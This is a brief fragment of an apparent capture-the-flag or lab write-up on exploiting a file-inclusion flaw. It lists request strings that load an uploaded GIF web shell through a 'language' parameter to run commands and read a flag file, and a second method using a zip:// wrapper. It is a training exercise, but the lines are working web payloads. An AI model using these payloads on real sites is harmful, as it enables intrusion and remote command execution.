April 21, 2024
Last updated 1 year ago
We can see here where is the file is being uploaded
?language=./profile_images/cmd.gif&cmd=ls
?language=./profile_images/cmd.gif&cmd=cd /;ls
http://94.237.49.182:47531/index.php?language=./profile_images/cmd.gif&cmd=cat /2f40d853e2d4768d87da1c81772bae0a.txt
Second way
?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id
Third way
